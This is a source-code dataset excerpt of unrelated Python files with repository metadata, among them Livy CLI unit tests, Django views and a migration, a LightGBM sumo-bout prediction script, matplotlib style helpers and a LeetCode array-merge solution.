expect = '{\n"test": "two", \n"example": "one"\n}'
ret = json.output(self.data)
self.assertEqual(expect, ret)
def test_negative_int_output(self):
json.__opts__['output_indent'] = -1
expect = '{"test": "two", "example": "one"}'
ret = json.output(self.data)
self.assertEqual(expect, ret)
def test_unicode_output(self):
json.__opts__['output_indent'] = 'pretty'
data = {'test': '\xe1', 'example': 'one'}
expect = ('{"message": "\'utf8\' codec can\'t decode byte 0xe1 in position 0: unexpected end of data", '
'"error": "Unable to serialize output to json"}')
ret = json.output(data)
self.assertEqual(expect, ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(JsonTestCase, needs_daemon=False)
| 30.411765
| 112
| 0.608801
|
794e35ef9b80c36133bc0ec1ec397d1cfa0b887c
| 5,446
|
py
|
Python
|
test/cli/test_submit.py
|
tzing/python-livy
|
0f2b0bf7832ae8fc65399506da294f4e8e019626
|
[
"MIT"
] | 1
|
2022-01-27T03:04:29.000Z
|
2022-01-27T03:04:29.000Z
|
test/cli/test_submit.py
|
tzing/python-livy
|
0f2b0bf7832ae8fc65399506da294f4e8e019626
|
[
"MIT"
] | null | null | null |
test/cli/test_submit.py
|
tzing/python-livy
|
0f2b0bf7832ae8fc65399506da294f4e8e019626
|
[
"MIT"
] | null | null | null |
import argparse
import datetime
import logging
import unittest
import unittest.mock
import livy.cli.submit as module
import livy.cli.config
import livy
class TestMain(unittest.TestCase):
def setUp(self) -> None:
# config getter
self.config = livy.cli.config.Configuration()
self.config.root.api_url = "http://example.com/"
patcher = unittest.mock.patch("livy.cli.config.load", return_value=self.config)
patcher.start()
self.addCleanup(patcher.stop)
# hook getter
patcher = unittest.mock.patch(
"livy.cli.submit.get_function", return_value=lambda x, y: y
)
self.get_function = patcher.start()
self.addCleanup(patcher.stop)
# livy client
self.client = unittest.mock.MagicMock(spec=livy.LivyClient)
self.client.create_batch.return_value = {"id": 1234}
patcher = unittest.mock.patch("livy.LivyClient", return_value=self.client)
patcher.start()
self.addCleanup(patcher.stop)
# log reader
self.reader = unittest.mock.MagicMock(spec=livy.LivyBatchLogReader)
patcher = unittest.mock.patch(
"livy.LivyBatchLogReader", return_value=self.reader
)
patcher.start()
self.addCleanup(patcher.stop)
def test_success(self):
# not reading log
self.assertEqual(
0,
module.main(
[
"test.py",
"--on-pre-submit",
"test_hook",
"--no-watch-log",
]
),
)
self.get_function.assert_called()
self.client.check.assert_called()
# reading log
self.client.get_batch_state.return_value = "success"
self.assertEqual(
0,
module.main(
[
"test.py",
"--on-pre-submit",
"test_hook",
]
),
)
def test_server_error(self):
self.client.check.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_create_batch_error_1(self):
self.client.create_batch.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_create_batch_error_2(self):
self.client.create_batch.return_value = {"foo": "bar"}
self.assertEqual(1, module.main(["test.py"]))
def test_readlog_error(self):
self.reader.read_until_finish.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_readlog_interrupt(self):
self.reader.read_until_finish.side_effect = KeyboardInterrupt()
self.assertEqual(1, module.main(["test.py"]))
def test_ending_get_batch_state(self):
self.client.get_batch_state.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_task_ending_error(self):
self.client.get_batch_state.return_value = "dead"
self.assertEqual(1, module.main(["test.py", "--on-task-failed", "test_hook"]))
class TestHelperFunc(unittest.TestCase):
def test_argument(self):
# memory size
self.assertEqual(module.argmem("1234GB"), "1234GB")
with self.assertRaises(argparse.ArgumentTypeError):
module.argmem("1234")
# key value pair
self.assertEqual(module.argkvpair("foo=bar=baz"), ("foo", "bar=baz"))
with self.assertRaises(ValueError):
module.argkvpair("1234")
def test_get_function(self):
# success
func = module.get_function("livy.cli.submit:get_function")
self.assertIs(func, module.get_function)
        # naming format error
self.assertIsNone(module.get_function("::error"))
# import error
self.assertIsNone(module.get_function("no_this_module:example"))
# func error
self.assertIsNone(module.get_function("livy.cli.submit:no_this_func"))
def test_run_hook(self):
logger = logging.getLogger(__name__)
args = unittest.mock.Mock(spec=argparse.Namespace)
patcher = unittest.mock.patch(
"livy.cli.submit.get_function", return_value=lambda x, y: y
)
# success
with patcher:
module.run_hook(logger, "TEST", args, ["foo"])
# failed to get func
with patcher as patch, self.assertRaises(SystemExit):
patch.return_value = None
module.run_hook(logger, "TEST", args, ["foo"])
# error during run action
with patcher as patch, self.assertRaises(SystemExit):
patch.return_value = unittest.mock.Mock(side_effect=ValueError())
module.run_hook(logger, "TEST", args, ["foo"])
# hook action's return value invalid
with patcher as patch, self.assertRaises(SystemExit):
patch.return_value = lambda x, y: None
module.run_hook(logger, "TEST", args, ["foo"])
def test_human_readable_timeperiod(self):
self.assertEqual(
"1h 5s",
module.human_readable_timeperiod(datetime.timedelta(seconds=3605)),
)
self.assertEqual(
"2d 1m 1s",
module.human_readable_timeperiod(datetime.timedelta(days=2, seconds=61)),
)
| 33.207317
| 87
| 0.608704
|
794e360407cf097b32fafa79d113cdba46d7f435
| 583
|
py
|
Python
|
wazimap_ng/profile/migrations/0016_auto_20200412_0544.py
|
arghyaiitb/wazimap-ng
|
2a77860526d865b8fd0c22a2204f121fdb3b28a0
|
[
"Apache-2.0"
] | 11
|
2019-12-31T20:27:22.000Z
|
2022-03-10T03:55:38.000Z
|
wazimap_ng/profile/migrations/0016_auto_20200412_0544.py
|
arghyaiitb/wazimap-ng
|
2a77860526d865b8fd0c22a2204f121fdb3b28a0
|
[
"Apache-2.0"
] | 164
|
2020-02-06T15:02:22.000Z
|
2022-03-30T22:42:00.000Z
|
wazimap_ng/profile/migrations/0016_auto_20200412_0544.py
|
arghyaiitb/wazimap-ng
|
2a77860526d865b8fd0c22a2204f121fdb3b28a0
|
[
"Apache-2.0"
] | 16
|
2020-01-03T20:30:24.000Z
|
2022-01-11T11:05:15.000Z
|
# Generated by Django 2.2.10 on 2020-04-12 05:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('profile', '0015_auto_20200411_2129'),
('points', '0013_auto_20200411_2129'),
]
    database_operations = [
        migrations.AlterModelTable('Licence', 'datasets_licence'),
    ]
    state_operations = [
    ]
    operations = [
        migrations.SeparateDatabaseAndState(
            database_operations=database_operations,
            state_operations=state_operations)
    ]
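# Note: SeparateDatabaseAndState applies `database_operations` (renaming the Licence table to
# 'datasets_licence' at the database level) without recording a matching change in Django's
# migration state, which is why `state_operations` is left empty here.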
| 18.806452
| 68
| 0.641509
|
794e366fd616491d3e4e742376a5307708afc112
| 758
|
py
|
Python
|
misago/misago/threads/api/postingendpoint/protect.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | 2
|
2021-03-06T21:06:13.000Z
|
2021-03-09T15:05:12.000Z
|
misago/misago/threads/api/postingendpoint/protect.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
misago/misago/threads/api/postingendpoint/protect.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from . import PostingEndpoint, PostingMiddleware
class ProtectMiddleware(PostingMiddleware):
def use_this_middleware(self):
return self.mode == PostingEndpoint.EDIT
def get_serializer(self):
return ProtectSerializer(data=self.request.data)
def post_save(self, serializer):
if self.thread.category.acl["can_protect_posts"]:
try:
self.post.is_protected = serializer.validated_data.get("protect", False)
self.post.update_fields.append("is_protected")
except (TypeError, ValueError):
pass
class ProtectSerializer(serializers.Serializer):
protect = serializers.BooleanField(required=False, default=False)
| 31.583333
| 88
| 0.701847
|
794e3928e5d961cc192bf0eac058a450eb405eee
| 84
|
py
|
Python
|
nxted/files/rotate.py
|
xlcteam/nxtIDE
|
659ace68b060682aeeb6d789d88a7b6899a56f9a
|
[
"MIT"
] | 8
|
2015-02-16T23:11:30.000Z
|
2021-01-16T00:15:25.000Z
|
nxted/files/rotate.py
|
xlcteam/nxtIDE
|
659ace68b060682aeeb6d789d88a7b6899a56f9a
|
[
"MIT"
] | 3
|
2016-07-16T20:47:48.000Z
|
2021-03-25T21:27:11.000Z
|
nxted/files/rotate.py
|
xlcteam/nxtIDE
|
659ace68b060682aeeb6d789d88a7b6899a56f9a
|
[
"MIT"
] | 3
|
2015-08-30T18:23:51.000Z
|
2016-10-28T15:07:59.000Z
|
def main():
OnFwd(OUT_A, 100)
OnRev(OUT_B, 100)
while 1:
pass
| 12
| 21
| 0.511905
|
794e395c965ecb4db0f6cc555342351e2d387081
| 9,490
|
py
|
Python
|
src/git_portfolio/prompt.py
|
staticdev/github-portfolio
|
850461eed8160e046ee16664ac3dbc19e3ec0965
|
[
"MIT"
] | null | null | null |
src/git_portfolio/prompt.py
|
staticdev/github-portfolio
|
850461eed8160e046ee16664ac3dbc19e3ec0965
|
[
"MIT"
] | null | null | null |
src/git_portfolio/prompt.py
|
staticdev/github-portfolio
|
850461eed8160e046ee16664ac3dbc19e3ec0965
|
[
"MIT"
] | null | null | null |
"""User prompting module."""
from __future__ import annotations
from typing import Any
from typing import cast
import inquirer
import git_portfolio.domain.gh_connection_settings as gcs
import git_portfolio.domain.issue as i
import git_portfolio.domain.pull_request as pr
import git_portfolio.domain.pull_request_merge as prm
import git_portfolio.prompt_validation as val
class InquirerPrompter:
"""Question prompting using inquirer."""
@staticmethod
def connect_github(github_access_token: str) -> gcs.GhConnectionSettings:
"""Prompt questions to connect to Github."""
questions = [
inquirer.Password(
"github_access_token",
message="GitHub access token",
validate=val.not_empty_validation,
default=github_access_token,
),
inquirer.Text(
"github_hostname",
message="GitHub hostname (change ONLY if you use GitHub Enterprise)",
),
]
answers = inquirer.prompt(questions)
return gcs.GhConnectionSettings(
answers["github_access_token"], answers["github_hostname"]
)
@staticmethod
def new_repos(github_selected_repos: list[str]) -> Any:
"""Prompt question to know if you want to select new repositories."""
message = "\nThe configured repos will be used:\n"
for repo in github_selected_repos:
message += f" * {repo}\n"
print(message)
answer = inquirer.prompt(
[inquirer.Confirm("", message="Do you want to select new repositories?")]
)[""]
return answer
@staticmethod
def select_repos(repo_names: list[str]) -> Any:
"""Prompt questions to select new repositories."""
while True:
message = "Which repos are you working on? (Select pressing space)"
selected = inquirer.prompt(
[
inquirer.Checkbox(
"github_repos",
message=message,
choices=repo_names,
)
]
)["github_repos"]
if selected:
return selected
else:
print("Please select with `space` at least one repo.\n")
@staticmethod
def create_issues(github_selected_repos: list[str]) -> i.Issue:
"""Prompt questions to create issues."""
questions = [
inquirer.Text(
"title",
message="Write an issue title",
validate=val.not_empty_validation,
),
inquirer.Text("body", message="Write an issue body [optional]"),
inquirer.Text(
"labels", message="Write issue labels [optional, separated by comma]"
),
inquirer.Confirm(
"correct",
message=(
"Confirm creation of issue for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
labels = (
{label.strip() for label in answers["labels"].split(",")}
if answers["labels"]
else set()
)
return i.Issue(0, answers["title"], answers["body"], labels)
@staticmethod
def query_by_title(github_selected_repos: list[str], object_name: str) -> str:
"""Prompt questions to close/reopen issues or pull requests."""
questions = [
inquirer.Text(
"object_title_query",
message=f"Write {object_name} title or part of it",
validate=val.not_empty_validation,
),
inquirer.Confirm(
"correct",
message=(
f"Confirm closing {object_name}(s) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
return cast(str, answers["object_title_query"])
@staticmethod
def create_pull_requests(
github_selected_repos: list[str],
) -> pr.PullRequest:
"""Prompt questions to create pull requests."""
questions = [
inquirer.Text(
"base",
message="Write base branch name (destination)",
default="main",
validate=val.not_empty_validation,
),
inquirer.Text(
"head",
message="Write the head branch name (source)",
validate=val.not_empty_validation,
),
inquirer.Text(
"title", message="Write a PR title", validate=val.not_empty_validation
),
inquirer.Text("body", message="Write an PR body [optional]"),
# inquirer.Confirm(
# "draft", message="Do you want to create a draft PR?", default=False
# ),
inquirer.Text(
"labels", message="Write PR labels [optional, separated by comma]"
),
inquirer.Confirm(
"confirmation",
message="Do you want to link pull request to issues by title?",
default=False,
),
inquirer.Text(
"issues_title_query",
message="Write issue title (or part of it)",
default="",
validate=val.not_empty_validation,
ignore=val.ignore_if_not_confirmed,
),
inquirer.Confirm(
"inherit_labels",
message="Do you want to add labels inherited from the issues?",
default=True,
ignore=val.ignore_if_not_confirmed,
),
inquirer.Confirm(
"correct",
message=(
"Confirm creation of pull request(s) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
labels = (
{label.strip() for label in answers["labels"].split(",")}
if answers["labels"]
else set()
)
return pr.PullRequest(
answers["title"],
answers["body"],
labels,
answers["confirmation"],
answers["issues_title_query"],
answers["inherit_labels"],
answers["head"],
answers["base"],
False,
)
@staticmethod
def delete_branches(github_selected_repos: list[str]) -> str:
"""Prompt questions to delete branches."""
questions = [
inquirer.Text(
"branch",
message="Write the branch name",
validate=val.not_empty_validation,
),
inquirer.Confirm(
"correct",
message=(
"Confirm deleting of branch(es) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
return cast(str, answers["branch"])
@staticmethod
def merge_pull_requests(
github_username: str, github_selected_repos: list[str]
) -> prm.PullRequestMerge:
"""Prompt questions to merge pull requests."""
questions = [
inquirer.Text(
"base",
message="Write base branch name (destination)",
default="main",
validate=val.not_empty_validation,
),
inquirer.Text(
"head",
message="Write the head branch name (source)",
validate=val.not_empty_validation,
),
inquirer.Text(
"prefix",
message="Write base user or organization name from PR head",
default=github_username,
validate=val.not_empty_validation,
),
inquirer.Confirm(
"delete_branch",
message="Do you want to delete head branch on merge?",
default=False,
),
inquirer.Confirm(
"correct",
message=(
"Confirm merging of pull request(s) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
return prm.PullRequestMerge(
answers["base"],
answers["head"],
answers["prefix"],
answers["delete_branch"],
)
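# Minimal sketch of how the comma-separated "labels" answers above are parsed (hypothetical input):
if __name__ == "__main__":
    raw = "bug, help wanted ,documentation"
    labels = {label.strip() for label in raw.split(",")} if raw else set()
    print(labels)  # {'bug', 'help wanted', 'documentation'} -- set order may vary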
| 34.384058
| 86
| 0.513066
|
794e3b37d45f4fc3326e29e616b25e67122f090b
| 154
|
py
|
Python
|
selfdrive/modeld/constants.py
|
Basketkase/openpilot
|
769e1cf7a8322ca83d1a86a2f547acf5e3a5a52e
|
[
"MIT"
] | 73
|
2017-10-28T20:52:31.000Z
|
2022-03-05T21:41:34.000Z
|
selfdrive/modeld/constants.py
|
Basketkase/openpilot
|
769e1cf7a8322ca83d1a86a2f547acf5e3a5a52e
|
[
"MIT"
] | 15
|
2021-09-03T10:11:55.000Z
|
2022-03-24T14:19:50.000Z
|
selfdrive/modeld/constants.py
|
Basketkase/openpilot
|
769e1cf7a8322ca83d1a86a2f547acf5e3a5a52e
|
[
"MIT"
] | 130
|
2020-08-19T04:20:02.000Z
|
2022-03-24T23:05:22.000Z
|
IDX_N = 33
def index_function(idx, max_val=192):
return (max_val/1024)*(idx**2)
T_IDXS = [index_function(idx, max_val=10.0) for idx in range(IDX_N)]
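# The quadratic spacing puts the last index exactly at max_val, since (max_val / 1024) * 32**2 == max_val
# when IDX_N == 33. A quick check of a few sample values:
if __name__ == "__main__":
    print(T_IDXS[0], T_IDXS[1], T_IDXS[16], T_IDXS[32])  # 0.0, ~0.0098, 2.5, 10.0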
| 19.25
| 68
| 0.707792
|
794e3c0378d9145c9ef4990247907bc95cdc4432
| 4,024
|
py
|
Python
|
pred.py
|
debunagoya/PredictVictoryofSumou
|
16fe94defaab2173f2ca6d0051db768b38590907
|
[
"MIT"
] | null | null | null |
pred.py
|
debunagoya/PredictVictoryofSumou
|
16fe94defaab2173f2ca6d0051db768b38590907
|
[
"MIT"
] | 2
|
2020-09-26T01:03:52.000Z
|
2021-06-08T21:33:08.000Z
|
pred.py
|
debunagoya/PredictVictoryofSumou
|
16fe94defaab2173f2ca6d0051db768b38590907
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import lightgbm as lgb
import pickle
from sklearn import metrics
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import LabelEncoder
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier as RandomForest
from sklearn.model_selection import GridSearchCV
## Load the CSV files
train = pd.read_csv("data/train.csv")
test = pd.read_csv("data/test.csv")
# ARR = []
# for i in range(1,13,2) :
# for j in range(1,16,1) :
# ARR.append([0,'Takakeisho','Kakuryu', 2020, i, j])
# test = pd.DataFrame(ARR, columns=['w_judge','w_name','e_name','year','month','day'])
### Drop missing values
train = train.dropna()
test = test.dropna()
train = train.drop(columns=['e_judge'])
train = train.drop(columns=['ruler'])
train = train.drop(columns=['w_rank'])
train = train.drop(columns=['e_rank'])
test = test.drop(columns=['e_judge'])
test = test.drop(columns=['ruler'])
test = test.drop(columns=['w_rank'])
test = test.drop(columns=['e_rank'])
# Concatenate the datasets
train = pd.concat([train,test], ignore_index=True)
### Category Encoder
for column in ['w_judge']:
le = LabelEncoder()
le.fit(train[column])
train[column] = le.transform(train[column])
le.fit(test[column])
test[column] = le.transform(test[column])
### One-hot Encoding
oh_w_class = pd.get_dummies(train.w_name)
oh_e_class = pd.get_dummies(train.e_name)
train.drop(['w_name','e_name'], axis=1, inplace=True)
train = pd.concat([train, oh_w_class, oh_e_class], axis=1)
_, i = np.unique(train.columns, return_index=True)
train = train.iloc[:, i]
### Build the dataset (features -> X, target -> y)
X = train.drop('w_judge', axis=1)
y = train.w_judge
# print('X shape: {}, y shape: {}'.format(X.shape, y.shape))
### Split the dataset
# X_train = X[0:len(X)-len(ARR)]
# X_test = X.tail(len(ARR))
# y_train = y[0:len(y)-len(ARR)]
# y_test = y.tail(len(ARR))
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=None)
# print("LinearRegression")
# model = LinearRegression()
# model.fit(X_train,y_train)
# print(model.score(X_train,y_train))
#
# print("LogisticRegression")
# model = LogisticRegression()
# model.fit(X_train,y_train)
# print(model.score(X_train,y_train))
# print("SVM")
# model = SVC()
# model.fit(X_train, y_train)
# predicted = model.predict(X_test)
# print(metrics.accuracy_score(Y_test, predicted))
# print("GridSearch")
# best_score = 0
# for gamma in [0.001, 0.01, 0.1, 1, 10, 100]:
# for C in [0.001, 0.01, 0.1, 1, 10, 100]:
# print(str(gamma) + "," + str(C))
# svm = SVC(gamma=gamma, C=C)
# svm.fit(X_train, y_train.values.ravel())
# score = svm.score(X_test, y_test)
# if score > best_score:
# best_score = score
# best_parameters = {'C':C, 'gamma':gamma}
# print("Best score: " + str(best_score))
# print("Best parameters: " + str(best_parameters))
# print("RandomForest")
# model = RandomForest(n_estimators=100).fit(X_train, y_train)
# print(model.score(X_test, y_test))
print("LightGBM")
train = lgb.Dataset(X_train, y_train)
test = lgb.Dataset(X_test, y_test, reference=train)
params = {
'objective': 'binary',
'metric': 'auc',
}
model = lgb.train(params, train, valid_sets=test)
with open('model.pickle', mode='wb') as f:
pickle.dump(model, f)
with open('model.pickle', mode='rb') as f:
model = pickle.load(f)
y_pred = model.predict(X_test, num_iteration=model.best_iteration)
print(len(y_pred))
acc = 0
for i in range(len(y_pred)) :
acc = acc + y_pred[i]
print(acc / len(y_pred))
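# Note: the value printed above is the mean predicted probability, not a classification accuracy.
# Minimal accuracy sketch, assuming the encoded w_judge target is binary and using a 0.5 threshold:
y_pred_label = (y_pred > 0.5).astype(int)
print("threshold-0.5 accuracy:", accuracy_score(y_test, y_pred_label))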
# model.save_model('model.txt')
#bst = lgb.Booster(model_file='model.txt')
#ypred = bst.predict(X_test, num_iteration=bst.best_iteration)
# fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred)
# auc = metrics.auc(fpr, tpr)
# print(auc)
| 29.807407
| 91
| 0.684891
|
794e3c19a4bb43ecdec762ffd05a01ccf93378da
| 331
|
py
|
Python
|
getUserInput.py
|
yogajia/Field-Programming
|
19891a9fff4cf66c60a4a5d9b1bd03f8d06f884b
|
[
"MIT"
] | null | null | null |
getUserInput.py
|
yogajia/Field-Programming
|
19891a9fff4cf66c60a4a5d9b1bd03f8d06f884b
|
[
"MIT"
] | null | null | null |
getUserInput.py
|
yogajia/Field-Programming
|
19891a9fff4cf66c60a4a5d9b1bd03f8d06f884b
|
[
"MIT"
] | 6
|
2021-10-30T00:17:23.000Z
|
2021-10-30T01:08:09.000Z
|
def getUserInput():
    level = 1
    print("输出:请输入你的年级")  # prompt: "Output: please enter your grade"
    grade = input("输入:")  # "Input:"
    if grade in ["一年级", "二年级"]:  # grade 1 or 2
        level = 1
    if grade in ["三年级", "四年级"]:  # grade 3 or 4
        level = 2
    if grade in ["五年级", "六年级"]:  # grade 5 or 6
        level = 3
    print("输出:请输入题目数")  # prompt: "Output: please enter the number of questions"
    num = input("输入:")  # "Input:"
    return level, int(num)
# print(getUserInput())
| 20.6875
| 31
| 0.504532
|
794e3c6584938c883a90a558379a5dbfd424b2dc
| 3,375
|
py
|
Python
|
apps/home/views.py
|
jjsanchezc/CONPY
|
c7a92f5bbf214813bc7f79baff803657fb40f3a2
|
[
"MIT"
] | 1
|
2022-02-19T17:21:57.000Z
|
2022-02-19T17:21:57.000Z
|
apps/home/views.py
|
jjsanchezc/CONPY
|
c7a92f5bbf214813bc7f79baff803657fb40f3a2
|
[
"MIT"
] | null | null | null |
apps/home/views.py
|
jjsanchezc/CONPY
|
c7a92f5bbf214813bc7f79baff803657fb40f3a2
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
import os
from django.shortcuts import render
from fileinput import filename
from django import template
from django.contrib.auth.decorators import login_required
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.template import loader
from django.urls import reverse
import apps.home.dataManagement.ingresos.manage as idm
import apps.home.dataManagement.gastos.manage as gdm
from core import settings
@login_required(login_url="/login/")
def index(request):
context = {'segment': 'index'}
html_template = loader.get_template('home/index.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/login/")
def pages(request):
context = {}
# All resource paths end in .html.
# Pick out the html file name from the url. And load that template.
try:
load_template = request.path.split('/')[-1]
if load_template == 'admin':
return HttpResponseRedirect(reverse('admin:index'))
context['segment'] = load_template
html_template = loader.get_template('home/' + load_template)
return HttpResponse(html_template.render(context, request))
except template.TemplateDoesNotExist:
html_template = loader.get_template('home/page-404.html')
return HttpResponse(html_template.render(context, request))
except:
html_template = loader.get_template('home/page-500.html')
return HttpResponse(html_template.render(context, request))
def upload(request):
print("llega hasta aca")
if request.method=="POST":
uploaded_file=request.FILES['documento']
print(uploaded_file.name)
print(uploaded_file.size)
return render(request,'upload-download.html')
@login_required(login_url="/login/")
def read_new_input(request):
"""metodo para leer el input de ingresos, este llama a las
funciones manage.py para poder procesarlos
Returns:
django.http.response.HttpResponse: devuelve a la pagina
de ingresos
"""
descr=request.POST.get('descripcion')
cant=request.POST.get('cantidad')
msg=None
exito=None
if request.POST.get('tipo')=='ingreso':
org=request.POST.get('origen/destino')
if cant!="" and org!="" :
try:
idm.add_ingresos(str(org),str(descr),float(cant))
exito="se ha añadido con exito a la base de datos"
except ValueError:
msg="no se han introducido datos correctos en cantidad"
else:
msg="Has dejado espacios obligatorios vacios"
elif request.POST.get('tipo')=='gasto':
destino=request.POST.get('origen/destino')
if cant!="" and destino!="" :
try:
gdm.add_gastos(str(destino),str(descr),float(cant))
exito="se ha añadido con exito a la base de datos"
except ValueError:
msg="no se han introducido datos correctos en cantidad"
else:
msg="Has dejado espacios obligatorios vacios"
print("gastos")
else:
print("no entré")
return render(request,'home/ingreso.html',{"msg":msg,"exito":exito})
def a(request):
print("--------------------------------------------\nhola soy a")
| 30.963303
| 72
| 0.653926
|
794e3cfa36ad6bc80f9103a307b39cb34c3659fd
| 539
|
py
|
Python
|
tests/aio/conftest.py
|
cuenca-mx/mongoengine-plus
|
01e55db2af58477bac2621ff51708daae3416268
|
[
"MIT"
] | null | null | null |
tests/aio/conftest.py
|
cuenca-mx/mongoengine-plus
|
01e55db2af58477bac2621ff51708daae3416268
|
[
"MIT"
] | 43
|
2021-04-30T20:02:49.000Z
|
2022-03-30T16:16:30.000Z
|
tests/aio/conftest.py
|
cuenca-mx/mongoengine-plus
|
01e55db2af58477bac2621ff51708daae3416268
|
[
"MIT"
] | null | null | null |
from typing import Generator, List
import pytest
from .cities import City
@pytest.fixture
def cities() -> Generator[List[City], None, None]:
cities = [
City(name='Villahermosa', state='Tabasco'),
City(name='Ciudad de México', state='CDMX'),
City(name='Monterrey', state='Nuevo León'),
City(name='San Cristobal', state='Chiapas'),
City(name='Tuxtla Gutiérrez', state='Chiapas'),
]
for city in cities:
city.save()
yield cities
for city in cities:
city.delete()
| 24.5
| 55
| 0.619666
|
794e3d0856c04f5110ffff67644f1b8c3a137c1c
| 1,609
|
py
|
Python
|
plotting.py
|
CSlocumWX/plotting
|
d13467202208a97d0a4bc487c0e001ae55690fb3
|
[
"BSD-3-Clause"
] | 2
|
2019-05-17T19:36:11.000Z
|
2022-03-07T08:34:21.000Z
|
plotting.py
|
CSlocumWX/plotting
|
d13467202208a97d0a4bc487c0e001ae55690fb3
|
[
"BSD-3-Clause"
] | null | null | null |
plotting.py
|
CSlocumWX/plotting
|
d13467202208a97d0a4bc487c0e001ae55690fb3
|
[
"BSD-3-Clause"
] | 1
|
2022-03-07T08:34:22.000Z
|
2022-03-07T08:34:22.000Z
|
"""
Loads my matplotlibrc file and allows me to customize
additional aspects of my plots
"""
import os
from warnings import warn
import matplotlib as mpl
import matplotlib.pyplot as plt
_path = os.path.dirname(os.path.abspath(__file__))
mpl.rc_context(fname=_path + "/matplotlibrc")
def change_style(society="utopia"):
"""
Loads other fonts based on the professional society
Parameters
----------
society : str
the name of the society
"""
if society == "ams":
font = "\usepackage{mathptmx},"
elif society == "agu":
font = "\usepackage[helvet]{sfmath},"
elif society == "utopia":
font = "\usepackage[adobe-utopia]{mathdesign},"
else:
warn("Style for society {society} not found. Using Computer Modern")
font = ''
with open(_path + "/preamble.txt", "r") as preamble:
mpl.rcParams['text.latex.preamble'] = preamble.read().format(font=font)
def pc2in(picas):
"""
Converts picas to inches
Parameters
----------
picas : int or float
dimension in picas
Returns
-------
inches : float
dimensions in inches
"""
if picas not in [19, 27, 33, 39, 68]:
warn("Not a standard AMS width")
return picas / 6.
def fix_ticklabels():
"""
Sets tick label typeface back to default while
preserving the default behavior of the major
label formatter
"""
for attr in ["xaxis", "yaxis"]:
fmt = getattr(plt.gca(), attr).get_major_formatter()
fmt._usetex = False
getattr(plt.gca(), attr).set_major_formatter(fmt)
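# Quick check of the picas -> inches conversion above (19, 27, 33 and 39 picas are among the
# standard AMS figure widths accepted by pc2in):
if __name__ == "__main__":
    for picas in (19, 27, 33, 39):
        print(picas, "pc ->", round(pc2in(picas), 3), "in")  # 3.167, 4.5, 5.5, 6.5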
| 25.140625
| 79
| 0.620883
|
794e3ff805ff4ab237c24e7c1ac354053dabd05d
| 1,149
|
py
|
Python
|
twopointer/merge_sorted_array.py
|
dsrao711/DSA-101-HacktoberFest
|
0d04e2aecee224080c34146e327ff6de15d9ba16
|
[
"MIT"
] | 16
|
2021-10-02T20:10:51.000Z
|
2022-03-06T10:31:11.000Z
|
twopointer/merge_sorted_array.py
|
dsrao711/DSA-101-HacktoberFest
|
0d04e2aecee224080c34146e327ff6de15d9ba16
|
[
"MIT"
] | 55
|
2021-10-02T07:31:41.000Z
|
2021-10-30T06:19:26.000Z
|
twopointer/merge_sorted_array.py
|
dsrao711/DSA-101-HacktoberFest
|
0d04e2aecee224080c34146e327ff6de15d9ba16
|
[
"MIT"
] | 36
|
2021-10-02T18:00:08.000Z
|
2022-01-03T18:50:35.000Z
|
# https://leetcode.com/problems/merge-sorted-array/
class Solution(object):
def merge(self, nums1, m, nums2, n):
"""
:type nums1: List[int]
:type m: int
:type nums2: List[int]
:type n: int
:rtype: None Do not return anything, modify nums1 in-place instead.
"""
# pointer 1 = m - 1
# pointer 2 = n - 1
last = m + n - 1
        # Since both arrays are sorted, compare their last valid elements:
        # if nums2's last element is larger, it becomes the last element of nums1;
        # otherwise nums1's last non-zero element is the largest and goes last.
        # Decrement the pointers and `last` accordingly.
while(m and n):
if(nums1[m-1] < nums2[n-1]):
nums1[last] = nums2[n-1]
n -= 1
else:
nums1[last] = nums1[m-1]
m -= 1
last -= 1
# If any elements are left in nums2 , append them in nums1
while(n):
nums1[last] = nums2[n-1]
n -= 1
last -= 1
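# Usage sketch (LeetCode calls merge() itself; shown here only to illustrate the in-place merge):
if __name__ == "__main__":
    nums1, m = [1, 2, 3, 0, 0, 0], 3
    nums2, n = [2, 5, 6], 3
    Solution().merge(nums1, m, nums2, n)
    print(nums1)  # [1, 2, 2, 3, 5, 6] -- merged in place from the back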
| 35.90625
| 104
| 0.499565
|
794e427802e0cd8d960c3515953aa1a305794516
| 5,572
|
py
|
Python
|
ambari-agent/src/main/python/ambari_agent/HostCheckReportFileHandler.py
|
mkozinenko/ambari
|
9cfe9559420a1f4af89a2d645af84b1ab20d6737
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
